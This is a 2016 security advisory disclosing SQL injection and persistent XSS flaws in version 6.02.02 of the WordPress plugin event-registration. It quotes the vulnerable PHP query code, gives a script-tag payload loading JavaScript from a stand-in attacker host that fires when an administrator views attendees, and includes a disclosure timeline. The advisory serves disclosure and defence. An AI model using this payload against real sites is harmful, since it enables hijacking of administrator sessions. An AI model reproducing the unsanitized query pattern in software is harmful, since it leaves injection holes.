* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and persistent XSS * Discovery Date: 2016/03/13 * Public Disclosure Date: 2016/05/09 * Exploit Author: Michael Helwig * Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net * Vendor Homepage: http://wpeventregister.com/ * Software Link: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/ * Version: 6.02.02 * Tested on: WordPress 4.4.1 * Category: webapps DESCRIPTION ----------- The plugin event-registration contains in its current version 6.02.02 multiple vulnerabilities: 1. SQL-Injections There is a SQL-Injection visible in the code in evt_public-process_confirmation.php line 32 22: $submitted_token = isset($_POST['token'])?$_POST['token']:'0'; .. no sanitization of $submitted_token ... 32: $sql = 'SELECT * FROM ' . get_option('evr_attendee') . " WHERE token='{$submitted_token}'"; 33: $attendee_valid = $wpdb->get_row($sql); Another injection is in line 63: 19: $qanda = unserialize(urldecode($_POST["questions"])); .. no sanitization of $qanda ... 61: $question_id = $qanda[$i]['question']; 62: $response = $qanda[$i]["response"]; 63: if($question_id !=''){$wpdb->query("INSERT into ".get_option('evr_answer')." (registration_id, question_id, answer) 64: values ('$reg_id', '$question_id', '$response')");} (see: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/public/evr_public-process_confirmation.php ) 2. Persistent XSS: There is a persistent XSS in attendee's first name and last name fields on registration confirmation (evr_public-process_confirmation.php). Quotes are escaped but the following vector still succeeds and is executed e.g. in Firefox and Chrome: <script src=http://evil.example.com/evil.js></script> When injected as first name or last name on the attendee's registration confirmation page (2. step in the attendee's default registration process), the injected script gets loaded as soon as a backend user visits the list of attendees. A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0 TIMELINE ------------ 2016/03/13 - Issues discovered 2016/03/21 - Issues reported to vendor. No response. 2016/03/31 - Issues reported to wordpress security team 2016/04/01 - Reply from Wordpress security team. Plugin vanished from plugin directory shortly after. 2016/05/09 - No information about any (planned) fixes. Disclosure.